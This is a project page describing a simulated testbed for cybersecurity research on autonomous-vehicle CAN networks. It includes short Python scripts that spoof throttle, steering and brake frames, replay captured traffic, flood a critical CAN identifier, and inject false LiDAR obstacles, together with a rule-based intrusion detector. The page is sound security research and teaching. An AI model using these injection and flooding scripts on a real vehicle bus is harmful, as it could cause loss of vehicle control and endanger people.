Autonomous Vehicles · Cybersecurity · CARLA · ROS · CAN

Cybersecurity Analysis of Autonomous Vehicle CAN Networks

This project presents a CARLA–ROS virtual testbed for evaluating CAN attacks, perception attacks, intrusion detection, and the effect of manipulated vehicle control and sensor data on autonomous driving behaviour.

Key Features

  • Self-driving vehicle in CARLA
  • CAN throttle, brake and steering spoofing, plus replay and DoS attacks
  • Rule-based IDS with dashboard alerts
  • LiDAR-based safety controller
  • False obstacle sensor attack demonstration

Overview

Project Aim

Modern vehicles depend on internal communication networks such as the Controller Area Network (CAN). Although CAN is efficient and widely used, it lacks built-in authentication and encryption, which makes it vulnerable to spoofing, replay and denial-of-service attacks.

This project builds a virtual testbed to investigate those weaknesses in a safe and repeatable environment. CARLA is used to simulate autonomous driving, ROS manages the distributed system, SocketCAN provides a vehicle network layer, and a custom dashboard is used to trigger attacks and monitor system behaviour in real time.

What the Project Demonstrates

Direct control attacks · Replay attack · DoS attack · Perception attack · IDS alerts · Dashboard monitoring · CARLA + ROS integration

Architecture

System Design

Windows Host

  • CARLA simulator
  • Autonomous control script
  • Dashboard interface
  • LiDAR safety / sensor attack script

Ubuntu / ROS

  • ROS core and rosbridge
  • CAN bridge
  • Attack injection node
  • IDS and logging nodes

CARLA / Agent → Control → CAN Frames → Vehicle
         ↑                     ↑
         │                     │
   Sensor Safety Layer    CAN Attack Node
         ↑                     │
   LiDAR / Camera          IDS + Logger
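The CAN bridge in the diagram above turns agent control commands into CAN frames. As a minimal sketch of that step (the arbitration ID 0x120 and the 8-byte layout are illustrative assumptions, not the project's actual frame format):

```python
import struct

# Hypothetical arbitration ID for the vehicle control frame.
CONTROL_FRAME_ID = 0x120

def pack_control_frame(throttle: float, steer: float, brake: float) -> bytes:
    """Pack normalised control values into an 8-byte CAN payload.

    throttle and brake are in [0, 1], steer in [-1, 1]. Each is scaled
    to an unsigned 16-bit integer; the last two bytes are padding.
    """
    t = round(max(0.0, min(1.0, throttle)) * 65535)
    b = round(max(0.0, min(1.0, brake)) * 65535)
    s = round((max(-1.0, min(1.0, steer)) + 1.0) / 2.0 * 65535)
    return struct.pack(">HHHxx", t, s, b)

def unpack_control_frame(payload: bytes) -> tuple:
    """Inverse of pack_control_frame, for the receiving side."""
    t, s, b = struct.unpack(">HHHxx", payload)
    return (t / 65535, s / 65535 * 2.0 - 1.0, b / 65535)
```

The same packing function can then be reused unchanged by the attack node, which is what makes spoofed frames indistinguishable from legitimate ones on an unauthenticated bus.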

Attacks

Implemented Threat Scenarios

Throttle, Brake and Steering Spoofing

These attacks inject crafted CAN messages to directly interfere with vehicle actuation. They demonstrate how malicious control commands can conflict with normal autonomous driving behaviour.
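A spoofing node can be sketched with python-can on a SocketCAN interface. The ID, payload layout ("full throttle, neutral steer, no brake") and the vcan0 channel below are assumptions for illustration, not the project's real configuration:

```python
import time

# Assumed arbitration ID and payload for the forged control frame.
SPOOF_ID = 0x120
SPOOF_DATA = bytes([0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00])

def inject(channel="vcan0", rate_hz=50, duration_s=5.0):
    """Send the forged frame faster than the legitimate controller,
    so the spoofed command dominates on the bus."""
    import can  # python-can, speaking SocketCAN

    with can.Bus(channel=channel, interface="socketcan") as bus:
        msg = can.Message(arbitration_id=SPOOF_ID, data=SPOOF_DATA,
                          is_extended_id=False)
        end = time.monotonic() + duration_s
        while time.monotonic() < end:
            bus.send(msg)
            time.sleep(1.0 / rate_hz)

if __name__ == "__main__":
    inject()
```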

Replay Attack

Legitimate CAN traffic is captured and can be replayed later in a different driving context. This shows how valid historical traffic can still be dangerous when reused at the wrong time.
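A capture-and-replay node can be sketched as below. The bus handling assumes python-can; the pacing logic, which preserves the original inter-frame timing so the replay looks plausible, is plain Python:

```python
import time

def inter_frame_delays(timestamps):
    """Delays to wait between replayed frames, preserving original pacing."""
    return [max(0.0, b - a) for a, b in zip(timestamps, timestamps[1:])]

def capture(bus, duration_s=10.0):
    """Record (timestamp, arbitration_id, data) tuples from the bus."""
    frames, end = [], time.monotonic() + duration_s
    while time.monotonic() < end:
        msg = bus.recv(timeout=0.5)
        if msg is not None:
            frames.append((msg.timestamp, msg.arbitration_id, bytes(msg.data)))
    return frames

def replay(bus, frames):
    """Re-send captured frames with their original inter-frame gaps."""
    import can  # python-can (assumed available on the ROS host)
    delays = [0.0] + inter_frame_delays([t for t, _, _ in frames])
    for delay, (_, can_id, data) in zip(delays, frames):
        time.sleep(delay)
        bus.send(can.Message(arbitration_id=can_id, data=data,
                             is_extended_id=False))
```

Every replayed frame is byte-for-byte valid, which is exactly why CAN's lack of freshness checks (no timestamps or nonces in the protocol) makes this attack work.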

DoS Attack

A high-rate flood of control frames targets critical CAN identifiers, creating contention with legitimate traffic and disrupting availability of the control path.
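A flooding node can be sketched as follows; the target ID 0x120 and vcan0 channel are assumptions. Because CAN arbitration favours lower identifiers, a sustained flood on a low, safety-critical ID starves legitimate traffic of bus time:

```python
def flood_frames(target_id=0x120, count=10000):
    """Generate forged frames for the flooded identifier.

    The payload content matters less than the frame rate: a zeroed
    payload at a low ID is enough to win arbitration repeatedly.
    """
    return [(target_id, bytes(8)) for _ in range(count)]

def run_flood(channel="vcan0"):
    """Push the generated frames onto the bus as fast as possible."""
    import can  # python-can (assumed available on the ROS host)
    with can.Bus(channel=channel, interface="socketcan") as bus:
        for can_id, data in flood_frames():
            bus.send(can.Message(arbitration_id=can_id, data=data,
                                 is_extended_id=False))
```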

Sensor Attack

A false obstacle is inserted into LiDAR-derived perception data before it reaches the safety logic. This causes the vehicle to slow or brake even when the road is clear.
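The mechanism can be sketched with a toy front-zone check over (x, y, z) points, x forward and y lateral. The corridor width, braking threshold and ghost-cluster shape are illustrative assumptions, not the project's actual safety parameters:

```python
def min_front_distance(points, lane_half_width=1.0, max_range=50.0):
    """Closest LiDAR return in the forward corridor ahead of the car."""
    ahead = [x for x, y, z in points
             if 0.0 < x < max_range and abs(y) <= lane_half_width]
    return min(ahead, default=max_range)

def inject_false_obstacle(points, distance=5.0, n_points=30):
    """Attack: append a fabricated cluster of returns directly ahead."""
    ghost = [(distance + 0.01 * i, 0.0, 0.5) for i in range(n_points)]
    return points + ghost

def brake_command(points, brake_distance=8.0):
    """Rule used by the safety layer: hard brake if something is close."""
    return min_front_distance(points) < brake_distance
```

Note that no CAN frame is forged here: the safety layer behaves correctly given its inputs, and the attack succeeds purely by corrupting those inputs.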

IDS

A rule-based intrusion detection system monitors CAN traffic, identifies suspicious injected frames and high-rate flooding, and displays live alerts in the dashboard.
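The detection logic can be sketched with two such rules: an allow-list of known arbitration IDs, and a per-ID rate limit over a sliding window. The thresholds below are illustrative, not the project's tuned values:

```python
from collections import deque

class RuleBasedIDS:
    """Two rules: unknown arbitration IDs, and per-ID frame-rate limits."""

    def __init__(self, known_ids, max_rate_hz=100, window_s=1.0):
        self.known_ids = set(known_ids)
        self.max_frames = max_rate_hz * window_s
        self.window_s = window_s
        self.history = {}  # can_id -> deque of recent frame timestamps

    def observe(self, timestamp, can_id):
        """Return a list of alert strings for this frame (empty if benign)."""
        alerts = []
        if can_id not in self.known_ids:
            alerts.append(f"unknown-id 0x{can_id:X}")
        q = self.history.setdefault(can_id, deque())
        q.append(timestamp)
        while q and timestamp - q[0] > self.window_s:
            q.popleft()  # drop frames that fell out of the window
        if len(q) > self.max_frames:
            alerts.append(f"flood 0x{can_id:X} ({len(q)} frames/window)")
        return alerts
```

The rate rule catches the DoS scenario; the allow-list rule catches injected frames on unexpected IDs. Spoofed frames on a known ID at a normal rate evade both, which is the usual limitation of purely rule-based CAN IDS.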

Logging and Visualisation

Attack activity, IDS events and CAN traffic are logged and displayed live, making the system suitable for demonstration, debugging and evaluation.

Results

Key Outcomes

Control-Plane Findings

  • Injected control frames can influence throttle, steering and braking.
  • Replay can reproduce valid but contextually incorrect behaviour.
  • DoS flooding can destabilise the control path.

Perception-Plane Findings

  • LiDAR is used in a front-zone safety controller.
  • False obstacle injection can trigger unnecessary braking.
  • This demonstrates indirect interference with self-driving behaviour.
  • Sensor attacks differ from CAN attacks because they alter what the system believes.

The project highlights the difference between direct actuation attacks that manipulate vehicle commands and indirect perception attacks that influence driving decisions by falsifying environmental understanding.

Technology Stack

Tools Used

CARLA · ROS Noetic · SocketCAN · PCAN · Python · PowerShell